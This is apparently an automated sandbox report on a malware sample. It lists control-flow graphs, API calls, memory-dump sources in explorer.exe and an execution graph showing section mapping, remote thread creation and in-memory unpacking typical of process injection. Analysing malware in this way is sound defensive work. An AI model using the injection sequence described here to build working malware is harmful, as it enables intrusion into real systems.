                                                                                                                                control_flow_graph 324 7dc1a60-7dc1a95 325 7dc1a97-7dc1a9e 324->325 326 7dc1ab3-7dc1ab7 325->326 327 7dc1ab9-7dc1ac5 326->327 328 7dc1aa0-7dc1ab1 326->328 329 7dc1adc-7dc1ae1 327->329 330 7dc1ac7-7dc1acd 327->330 328->326 332 7dc1ae7-7dc1aee 329->332 331 7dc1acf-7dc1ada 330->331 330->332 331->332 333 7dc1af9-7dc1aff 332->333 334 7dc1af0-7dc1af7 332->334 333->325 335 7dc1b01-7dc1b0b 333->335 334->333 334->335 336 7dc1b0d-7dc1b14 335->336 337 7dc1b1a-7dc1b32 call 7dc1d98 335->337 336->337 339 7dc1d6f 336->339 337->339 342 7dc1b38-7dc1b5a call 7dc1d98 337->342 341 7dc1d71-7dc1d8f 339->341 342->339 345 7dc1b60-7dc1b8f RtlCreateHeap 342->345 346 7dc1b91-7dc1bab call 7dc4fac 345->346 346->339 350 7dc1bb1-7dc1bc9 call 7dc535c 346->350 350->346 353 7dc1bcb-7dc1be6 call 7dc1d98 350->353 353->339 356 7dc1bec-7dc1c0b call 7dc1d98 353->356 356->339 359 7dc1c11-7dc1c30 call 7dc1d98 356->359 359->339 362 7dc1c36-7dc1c55 call 7dc1d98 359->362 362->339 365 7dc1c5b-7dc1c7a call 7dc1d98 362->365 365->339 368 7dc1c80-7dc1c9f call 7dc1d98 365->368 368->339 371 7dc1ca5-7dc1d00 call 7dc4bac * 3 368->371 371->339 378 7dc1d02-7dc1d09 371->378 378->339 379 7dc1d0b-7dc1d0e 378->379 379->339 380 7dc1d10-7dc1d60 CreateThread * 2 379->380 382 7dc1d68-7dc1d6d 380->382 382->341
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000008.00000002.2949689441.0000000007DC1000.00000020.80000000.00040000.00000000.sdmp, Offset: 07DC1000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_8_2_7dc1000_explorer.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: Create$Thread$Heap
                                                                                                                                • String ID: iP+
                                                                                                                                • API String ID: 1054751041-51890417
                                                                                                                                • Opcode ID: 2cb0cc4895ba9d61a021ba4609a68b07abc7c0267e95d8eab074489c4e5da047
                                                                                                                                • Instruction ID: 6e9a02798437700e1b3f9af63c4a06b3807990b8f65fb3030946f6cdf560d2c2
                                                                                                                                • Opcode Fuzzy Hash: 2cb0cc4895ba9d61a021ba4609a68b07abc7c0267e95d8eab074489c4e5da047
                                                                                                                                • Instruction Fuzzy Hash: 9791D3B0218E0E8FCF14EF28D8916A5B3D6FB98300F08057E9C4ECB15BEA35D5518B96

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000008.00000002.2949612215.0000000007D71000.00000020.80000000.00040000.00000000.sdmp, Offset: 07D71000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_8_2_7d71000_explorer.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: File$AttributesCreateTime
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1986686026-0
                                                                                                                                • Opcode ID: 608125a8aa1bce6175559d74748fb29477d2e5ca9ccfc86ce4b79151e6103723
                                                                                                                                • Instruction ID: c33bc15366708c9832c70d9b8e697d7526d8825f4cce5d4f084d7d49ed118559
                                                                                                                                • Opcode Fuzzy Hash: 608125a8aa1bce6175559d74748fb29477d2e5ca9ccfc86ce4b79151e6103723
                                                                                                                                • Instruction Fuzzy Hash: E6212F3070CA488FDF64EF68988879EB6E2FBD8701F10456EA84EC7255DA34DA058782

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 392 7d74e90-7d74ed9 call 7d74fac 396 7d74f63-7d74f92 call 7d7535c ObtainUserAgentString 392->396 397 7d74edf 392->397 399 7d74ee1-7d74f23 call 7d74fac RegQueryValueExA 397->399 403 7d74f25-7d74f44 call 7d7535c call 7d7516c 399->403 404 7d74f93 call 7d7535c 399->404 407 7d74f98-7d74f9d 403->407 413 7d74f46-7d74f57 403->413 404->407 410 7d74f9f 407->410 411 7d74f59-7d74f5a 407->411 410->399 411->396 413->411
                                                                                                                                APIs
                                                                                                                                • RegQueryValueExA.KERNEL32 ref: 07D74F15
                                                                                                                                • ObtainUserAgentString.URLMON ref: 07D74F7E
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000008.00000002.2949612215.0000000007D71000.00000020.80000000.00040000.00000000.sdmp, Offset: 07D71000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_8_2_7d71000_explorer.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: AgentObtainQueryStringUserValue
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4107646653-0
                                                                                                                                • Opcode ID: 1ee60c0f534f3764a8b7c02e3106e8c1bbbc8228cd7f8668cbf5d1b2e0d7aa71
                                                                                                                                • Instruction ID: 60903ac77fcf6ecac0d09c519e825ad07a4e0470036dca519b9ba6a357ed4d74
                                                                                                                                • Opcode Fuzzy Hash: 1ee60c0f534f3764a8b7c02e3106e8c1bbbc8228cd7f8668cbf5d1b2e0d7aa71
                                                                                                                                • Instruction Fuzzy Hash: 5E317271608A4C8FDB18EF68D8896EAB7D5FB98314B04427AE84FC3545EE70980587A2

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 07D74D20: GetVolumeInformationA.KERNEL32 ref: 07D74D8D
                                                                                                                                • CreateMutexExA.KERNEL32 ref: 07D71E8F
                                                                                                                                • CreateFileMappingA.KERNEL32 ref: 07D71F41
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000008.00000002.2949612215.0000000007D71000.00000020.80000000.00040000.00000000.sdmp, Offset: 07D71000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_8_2_7d71000_explorer.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: Create$FileInformationMappingMutexVolume
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3260430491-0
                                                                                                                                • Opcode ID: 9e9a34ea7cb298080777c61faf39ef342cf239ea35ae18d0dbcb535cd23d3ff0
                                                                                                                                • Instruction ID: 134e75d9a50fe1fb867c4f40265b58ea024a27485acaa511242f518a455903ba
                                                                                                                                • Opcode Fuzzy Hash: 9e9a34ea7cb298080777c61faf39ef342cf239ea35ae18d0dbcb535cd23d3ff0
                                                                                                                                • Instruction Fuzzy Hash: A7416FB0714F0CCFEB64EB3880587AAF6D2EB98706F504A2E805FD6254DF759602D782

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 07DC4D20: GetVolumeInformationA.KERNEL32 ref: 07DC4D8D
                                                                                                                                • CreateMutexExA.KERNEL32 ref: 07DC1E8F
                                                                                                                                • CreateFileMappingA.KERNEL32 ref: 07DC1F41
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000008.00000002.2949689441.0000000007DC1000.00000020.80000000.00040000.00000000.sdmp, Offset: 07DC1000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_8_2_7dc1000_explorer.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: Create$FileInformationMappingMutexVolume
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3260430491-0
                                                                                                                                • Opcode ID: 9e9a34ea7cb298080777c61faf39ef342cf239ea35ae18d0dbcb535cd23d3ff0
                                                                                                                                • Instruction ID: 21dffbd5b48aa6cbc8f781c8448d70feae9848df4e60e6f1d23606b752de19cc
                                                                                                                                • Opcode Fuzzy Hash: 9e9a34ea7cb298080777c61faf39ef342cf239ea35ae18d0dbcb535cd23d3ff0
                                                                                                                                • Instruction Fuzzy Hash: FD4172B0714F1DCFDB64EB3880587AAB6D2EB98706F504A2E805FC7145CF75A6029782

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                • GetTokenInformation.KERNELBASE ref: 07D74B24
                                                                                                                                • GetTokenInformation.KERNELBASE ref: 07D74B5B
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000008.00000002.2949612215.0000000007D71000.00000020.80000000.00040000.00000000.sdmp, Offset: 07D71000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_8_2_7d71000_explorer.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: InformationToken
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4114910276-0
                                                                                                                                • Opcode ID: 37b38c91b308edf2e4bebcb754188a08756fa8f3a9c0e1e81f7644c00244d549
                                                                                                                                • Instruction ID: 115c069ea269b0b621f20bcd553ebe7a08549dc6c9411ee5bb10c735ca0b4ed7
                                                                                                                                • Opcode Fuzzy Hash: 37b38c91b308edf2e4bebcb754188a08756fa8f3a9c0e1e81f7644c00244d549
                                                                                                                                • Instruction Fuzzy Hash: 05216030608B088FC754EF28D49866AB7E1FFD9311B000A6EE49AC7264DF30E805DB92

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                • GetTokenInformation.KERNELBASE ref: 07DC4B24
                                                                                                                                • GetTokenInformation.KERNELBASE ref: 07DC4B5B
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000008.00000002.2949689441.0000000007DC1000.00000020.80000000.00040000.00000000.sdmp, Offset: 07DC1000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_8_2_7dc1000_explorer.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: InformationToken
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4114910276-0
                                                                                                                                • Opcode ID: 37b38c91b308edf2e4bebcb754188a08756fa8f3a9c0e1e81f7644c00244d549
                                                                                                                                • Instruction ID: be8891b5116c766f3d7691edae150ebc375582ff9b0b76e837b3866ada092f6a
                                                                                                                                • Opcode Fuzzy Hash: 37b38c91b308edf2e4bebcb754188a08756fa8f3a9c0e1e81f7644c00244d549
                                                                                                                                • Instruction Fuzzy Hash: 25216030608B098FC754EF28D49866AB7F1FFD9311B100A6EE49AC7264CF30E805DB82

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 517 7dc3c84-7dc3c9b 518 7dc3d3b-7dc3d54 517->518 519 7dc3ca1-7dc3cb3 CreateToolhelp32Snapshot 517->519 520 7dc3cb5-7dc3ccb 519->520 521 7dc3d23-7dc3d35 SleepEx 519->521 523 7dc3d16-7dc3d18 520->523 521->518 521->519 524 7dc3ccd-7dc3ce4 call 7dc5140 523->524 525 7dc3d1a-7dc3d1b 523->525 528 7dc3ce6-7dc3ce8 524->528 525->521 529 7dc3cfc-7dc3d03 call 7dc47a4 528->529 530 7dc3cea-7dc3cf8 528->530 533 7dc3d08-7dc3d0e 529->533 530->528 531 7dc3cfa 530->531 531->533 533->523
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000008.00000002.2949689441.0000000007DC1000.00000020.80000000.00040000.00000000.sdmp, Offset: 07DC1000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_8_2_7dc1000_explorer.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateSleepSnapshotToolhelp32
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 684154974-0
                                                                                                                                • Opcode ID: d87648c068091f5a601a251f696ac908138681014b07281b27555691989c57a1
                                                                                                                                • Instruction ID: 8a72768f4debaa1708f4d6239f9ead3d676750fac394f16edb42d93b665ddace
                                                                                                                                • Opcode Fuzzy Hash: d87648c068091f5a601a251f696ac908138681014b07281b27555691989c57a1
                                                                                                                                • Instruction Fuzzy Hash: 3921E770118A0A8FDB18EF24C0987AAB2E2FB88315F18467ED44FDF189DB3485458762

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 534 7d73d60-7d73d70 535 7d73d96-7d73da4 534->535 536 7d73d72-7d73d94 EnumWindows SleepEx 534->536 536->535 536->536
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000008.00000002.2949612215.0000000007D71000.00000020.80000000.00040000.00000000.sdmp, Offset: 07D71000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_8_2_7d71000_explorer.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: EnumSleepWindows
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 498413330-0
                                                                                                                                • Opcode ID: bcd33d68b26800d53c1a0055312e6970b5242bc1254dfeb745dd1bbf27494588
                                                                                                                                • Instruction ID: 5c21ae2618895073c5542e9ccc913e2c19384e71a2e05ec0e8d9a96f2572832b
                                                                                                                                • Opcode Fuzzy Hash: bcd33d68b26800d53c1a0055312e6970b5242bc1254dfeb745dd1bbf27494588
                                                                                                                                • Instruction Fuzzy Hash: 74E04F70504A098FEB28ABA4C0DCBB032A1EB18306F18017ADC0EDD295DB764945D720

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 537 7dc3d60-7dc3d70 538 7dc3d96-7dc3da4 537->538 539 7dc3d72-7dc3d94 EnumWindows SleepEx 537->539 539->538 539->539
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000008.00000002.2949689441.0000000007DC1000.00000020.80000000.00040000.00000000.sdmp, Offset: 07DC1000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_8_2_7dc1000_explorer.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: EnumSleepWindows
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 498413330-0
                                                                                                                                • Opcode ID: bcd33d68b26800d53c1a0055312e6970b5242bc1254dfeb745dd1bbf27494588
                                                                                                                                • Instruction ID: 913517ffccc539b9d7ba462f4a0656a5ee5bdf557c96c8f319d4a03626a6a722
                                                                                                                                • Opcode Fuzzy Hash: bcd33d68b26800d53c1a0055312e6970b5242bc1254dfeb745dd1bbf27494588
                                                                                                                                • Instruction Fuzzy Hash: 06E04F70504A0A8FEB28EBA4C0DCBB032A1EB18206F18017EDC0EDE299CF764945C721
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000008.00000002.2949612215.0000000007D71000.00000020.80000000.00040000.00000000.sdmp, Offset: 07D71000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_8_2_7d71000_explorer.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: e4a96c0002796f4483eb6bc6feb746ec78d293e7f1134298137c4194076fbbcd
                                                                                                                                • Instruction ID: 20551f16f78b700ab83b5230cf868826119310fd181d48e2a337af8bdcc5f858
                                                                                                                                • Opcode Fuzzy Hash: e4a96c0002796f4483eb6bc6feb746ec78d293e7f1134298137c4194076fbbcd
                                                                                                                                • Instruction Fuzzy Hash: 3AD17E70718B498BDB65EF68D4456AEF7E2FB98701F10452EE44AD3251EF74E802CB82
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000008.00000002.2949689441.0000000007DC1000.00000020.80000000.00040000.00000000.sdmp, Offset: 07DC1000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_8_2_7dc1000_explorer.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateFile
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 823142352-0
                                                                                                                                • Opcode ID: 11cbd7d4e9e3daf7bdfec7693b32ce184b43af76b4895d117b786d6ffa4ff202
                                                                                                                                • Instruction ID: d9feaab6226a45a8d008a8251a594f3f8ac53ee2df241646f3cd45e84f17a56c
                                                                                                                                • Opcode Fuzzy Hash: 11cbd7d4e9e3daf7bdfec7693b32ce184b43af76b4895d117b786d6ffa4ff202
                                                                                                                                • Instruction Fuzzy Hash: 3C415E60718A4D8FDBA8EF6C941836DB5D2EBD8310F50416EA80FC3285DE749D058796
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000008.00000002.2949612215.0000000007D71000.00000020.80000000.00040000.00000000.sdmp, Offset: 07D71000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_8_2_7d71000_explorer.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateFile
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 823142352-0
                                                                                                                                • Opcode ID: ce663faf5a716b1ca10baa4e22fa9f7e4c3774f53785b3b9c2244f163c36e0eb
                                                                                                                                • Instruction ID: 6a65b835a5f20222bfad879500067b04b782467a1faef5cb47a005cb07ac02a9
                                                                                                                                • Opcode Fuzzy Hash: ce663faf5a716b1ca10baa4e22fa9f7e4c3774f53785b3b9c2244f163c36e0eb
                                                                                                                                • Instruction Fuzzy Hash: 0841B37071CF4D4FD75CEA6C985A37AF6C2EB88215F14022EA89FC3255EE649C1687C2
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000008.00000002.2949689441.0000000007DC1000.00000020.80000000.00040000.00000000.sdmp, Offset: 07DC1000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_8_2_7dc1000_explorer.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateFile
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 823142352-0
                                                                                                                                • Opcode ID: ce663faf5a716b1ca10baa4e22fa9f7e4c3774f53785b3b9c2244f163c36e0eb
                                                                                                                                • Instruction ID: f49b2f11f8df9cd25b6755817535965d7f064f45bd8740cd451846103d0fe858
                                                                                                                                • Opcode Fuzzy Hash: ce663faf5a716b1ca10baa4e22fa9f7e4c3774f53785b3b9c2244f163c36e0eb
                                                                                                                                • Instruction Fuzzy Hash: ED41B67071CF0E4FD75CEA6C985937AB6C2EBC8211F64422E989BC3245DE64AC1647C2
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000008.00000002.2949689441.0000000007DC1000.00000020.80000000.00040000.00000000.sdmp, Offset: 07DC1000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_8_2_7dc1000_explorer.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: QueryValue
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3660427363-0
                                                                                                                                • Opcode ID: 1ee60c0f534f3764a8b7c02e3106e8c1bbbc8228cd7f8668cbf5d1b2e0d7aa71
                                                                                                                                • Instruction ID: 20b214ded6ffcca233846de6f62800098c31a8aefc6346fad38d7a6d40cf961a
                                                                                                                                • Opcode Fuzzy Hash: 1ee60c0f534f3764a8b7c02e3106e8c1bbbc8228cd7f8668cbf5d1b2e0d7aa71
                                                                                                                                • Instruction Fuzzy Hash: 0931A47160CA4D8FDB18EF68D8996EAB7D5FB98314F14027EE84BC3145EE70D8068791
                                                                                                                                APIs
                                                                                                                                • GetVolumeInformationA.KERNEL32 ref: 07D74D8D
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000008.00000002.2949612215.0000000007D71000.00000020.80000000.00040000.00000000.sdmp, Offset: 07D71000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_8_2_7d71000_explorer.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: InformationVolume
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2039140958-0
                                                                                                                                • Opcode ID: f6d21cd985884bbd1fecacc52d91767e00694267905ea377f3a61296193c8c2d
                                                                                                                                • Instruction ID: af15822924e6776b690d2676a22005e23171a7d55de7c0751de2bff162a548d2
                                                                                                                                • Opcode Fuzzy Hash: f6d21cd985884bbd1fecacc52d91767e00694267905ea377f3a61296193c8c2d
                                                                                                                                • Instruction Fuzzy Hash: C1316730618A4C8FDB64EF68D448BAA77E1FBD8311F10466E984FC7264EE70D945CB92
                                                                                                                                APIs
                                                                                                                                • GetVolumeInformationA.KERNEL32 ref: 07DC4D8D
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000008.00000002.2949689441.0000000007DC1000.00000020.80000000.00040000.00000000.sdmp, Offset: 07DC1000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_8_2_7dc1000_explorer.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: InformationVolume
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2039140958-0
                                                                                                                                • Opcode ID: f6d21cd985884bbd1fecacc52d91767e00694267905ea377f3a61296193c8c2d
                                                                                                                                • Instruction ID: aab5202d2cedde96581007b2ec9731faab5f00b9666cdf0ad4a5fd82bd0c3d45
                                                                                                                                • Opcode Fuzzy Hash: f6d21cd985884bbd1fecacc52d91767e00694267905ea377f3a61296193c8c2d
                                                                                                                                • Instruction Fuzzy Hash: 7B316730618A4C8FDB64EF68D448BAA77E1FBD8311F10466E984FC7264DE70D945CB92
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 07D71A60: RtlCreateHeap.NTDLL ref: 07D71B77
                                                                                                                                • SleepEx.KERNEL32(?,?,?,?,?,?,?,07D71A03), ref: 07D71A30
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000008.00000002.2949612215.0000000007D71000.00000020.80000000.00040000.00000000.sdmp, Offset: 07D71000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_8_2_7d71000_explorer.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateHeapSleep
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 221814145-0
                                                                                                                                • Opcode ID: 9adc8d4cde1f516ddaa5c4750073014e5650bc8f10d33b0d75f43d3a0b67238f
                                                                                                                                • Instruction ID: c3d4de350b5869ac8cdf3c7d0b27999fd1d6b1341e6a30864a780ff023d37fe2
                                                                                                                                • Opcode Fuzzy Hash: 9adc8d4cde1f516ddaa5c4750073014e5650bc8f10d33b0d75f43d3a0b67238f
                                                                                                                                • Instruction Fuzzy Hash: 68E048A0714B0D4BDB94BB78958432CE190D7C8250F501679690DC6185F825C982C322
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 07DC1A60: RtlCreateHeap.NTDLL ref: 07DC1B77
                                                                                                                                • SleepEx.KERNEL32(?,?,?,?,?,?,?,07DC1A03), ref: 07DC1A30
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000008.00000002.2949689441.0000000007DC1000.00000020.80000000.00040000.00000000.sdmp, Offset: 07DC1000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_8_2_7dc1000_explorer.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateHeapSleep
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 221814145-0
                                                                                                                                • Opcode ID: 9adc8d4cde1f516ddaa5c4750073014e5650bc8f10d33b0d75f43d3a0b67238f
                                                                                                                                • Instruction ID: 71c94eb694bfcecdff49e4cf1cb2dc65da8940f0cc570d605b92f47bb0a24e24
                                                                                                                                • Opcode Fuzzy Hash: 9adc8d4cde1f516ddaa5c4750073014e5650bc8f10d33b0d75f43d3a0b67238f
                                                                                                                                • Instruction Fuzzy Hash: 7BE048E0714A1F4BDB98FBB8958432CE190D7C8250F94157D650DC7186D825C9824322

                                                                                                                                Execution Graph

                                                                                                                                Execution Coverage:8.3%
                                                                                                                                Dynamic/Decrypted Code Coverage:19.9%
                                                                                                                                Signature Coverage:0%
                                                                                                                                Total number of Nodes:156
                                                                                                                                Total number of Limit Nodes:6
                                                                                                                                execution_graph 4106 402e42 4109 402e47 4106->4109 4107 402f18 4108 401902 8 API calls 4107->4108 4111 402f4c 4107->4111 4108->4111 4109->4107 4110 4020ea NtQuerySystemInformation 4109->4110 4109->4111 4110->4107 4034 7b003c 4035 7b0049 4034->4035 4047 7b0e0f SetErrorMode SetErrorMode 4035->4047 4040 7b0265 4041 7b02ce VirtualProtect 4040->4041 4043 7b030b 4041->4043 4042 7b0439 VirtualFree 4046 7b04be LoadLibraryA 4042->4046 4043->4042 4045 7b08c7 4046->4045 4048 7b0223 4047->4048 4049 7b0d90 4048->4049 4050 7b0dad 4049->4050 4051 7b0dbb GetPEB 4050->4051 4052 7b0238 VirtualAlloc 4050->4052 4051->4052 4052->4040 4265 418986 4266 418990 4265->4266 4267 418940 SetPriorityClass 4266->4267 4268 4189ad 4266->4268 4267->4266 4057 82fece 4058 82fed2 4057->4058 4061 82ff17 4057->4061 4062 82fedf 4058->4062 4063 82feee 4062->4063 4066 83067f 4063->4066 4071 83069a 4066->4071 4067 8306a3 CreateToolhelp32Snapshot 4068 8306bf Module32First 4067->4068 4067->4071 4069 8306ce 4068->4069 4072 82fede 4068->4072 4073 83033e 4069->4073 4071->4067 4071->4068 4074 830369 4073->4074 4075 8303b2 4074->4075 4076 83037a VirtualAlloc 4074->4076 4075->4075 4076->4075 4212 40190e 4213 401912 4212->4213 4215 4018b5 4212->4215 4214 401946 Sleep 4213->4214 4216 401961 4214->4216 4217 401529 7 API calls 4216->4217 4218 401972 4216->4218 4217->4218 4219 7b092b GetPEB 4220 7b0972 4219->4220 3978 418ed0 3981 418a70 3978->3981 3980 418ed5 3982 418a7d 3981->3982 3983 418b80 7 API calls 3982->3983 3984 418cc6 3982->3984 3986 418bf8 7 API calls 3983->3986 3985 418cd4 SetCommState 3984->3985 3989 418ced 3984->3989 3985->3984 3987 418ca4 3986->3987 3988 418c98 ObjectPrivilegeAuditAlarmW 3986->3988 3990 418cb5 3987->3990 3991 418cad WaitForSingleObject 3987->3991 3988->3987 3992 418daa 3989->3992 3993 418cfa 9 API calls 3989->3993 3990->3984 3991->3990 4005 418740 LocalAlloc 3992->4005 4000 418d88 3993->4000 3997 418daf LoadLibraryA 4006 418770 GetModuleHandleW GetProcAddress VirtualProtect 3997->4006 3998 418dfd 4007 4189d0 3998->4007 4000->3992 4001 418e02 4002 418e43 InterlockedCompareExchange 4001->4002 4003 418e23 MoveFileW 4001->4003 4004 418e5d 4001->4004 4002->4001 4003->4001 4004->3980 4005->3997 4006->3998 4008 4189f9 QueryDosDeviceW 4007->4008 4009 418a0a 4007->4009 4008->4009 4018 418910 4009->4018 4012 418a25 4021 418950 4012->4021 4013 418a1d FreeEnvironmentStringsA 4013->4012 4016 418a57 4016->4001 4017 418a3c HeapCreate GetNumaProcessorNode 4017->4016 4019 418921 FatalAppExitA GetModuleHandleA 4018->4019 4020 418933 4018->4020 4019->4020 4020->4012 4020->4013 4022 41896c 4021->4022 4023 41895e BuildCommDCBA 4021->4023 4024 418974 FreeEnvironmentStringsA 4022->4024 4025 41897c 4022->4025 4023->4025 4024->4025 4026 4189ad 4025->4026 4028 418940 4025->4028 4026->4016 4026->4017 4031 4188c0 4028->4031 4032 4188eb 4031->4032 4033 4188dc SetPriorityClass 4031->4033 4032->4025 4033->4032 4118 4014db 4119 40148f 4118->4119 4127 401469 4118->4127 4119->4118 4120 4015d5 NtDuplicateObject 4119->4120 4119->4127 4121 4015f2 NtCreateSection 4120->4121 4120->4127 4122 401672 NtCreateSection 4121->4122 4123 401618 NtMapViewOfSection 4121->4123 4125 40169e 4122->4125 4122->4127 4123->4122 4124 40163b NtMapViewOfSection 4123->4124 4124->4122 4126 401659 4124->4126 4125->4127 4128 4016a8 NtMapViewOfSection 4125->4128 4126->4122 4128->4127 4129 4016cf NtMapViewOfSection 4128->4129 4129->4127 4225 401922 4226 401930 4225->4226 4227 401946 Sleep 4226->4227 4228 401961 4227->4228 4229 401529 7 API calls 4228->4229 4230 401972 4228->4230 4229->4230 4247 401534 4248 401546 4247->4248 4249 4015d5 NtDuplicateObject 4248->4249 4256 4016f1 4248->4256 4250 4015f2 NtCreateSection 4249->4250 4249->4256 4251 401672 NtCreateSection 4250->4251 4252 401618 NtMapViewOfSection 4250->4252 4254 40169e 4251->4254 4251->4256 4252->4251 4253 40163b NtMapViewOfSection 4252->4253 4253->4251 4255 401659 4253->4255 4254->4256 4257 4016a8 NtMapViewOfSection 4254->4257 4255->4251 4257->4256 4258 4016cf NtMapViewOfSection 4257->4258 4258->4256 4053 402ffa 4054 40313d 4053->4054 4055 403024 4053->4055 4055->4054 4056 4030df RtlCreateUserThread NtTerminateProcess 4055->4056 4056->4054 4077 402ebc 4080 402eb4 4077->4080 4078 402f18 4082 402f4c 4078->4082 4088 401902 4078->4088 4080->4078 4080->4082 4083 4020ea 4080->4083 4084 4020fb 4083->4084 4085 40214e 4084->4085 4086 402152 NtQuerySystemInformation 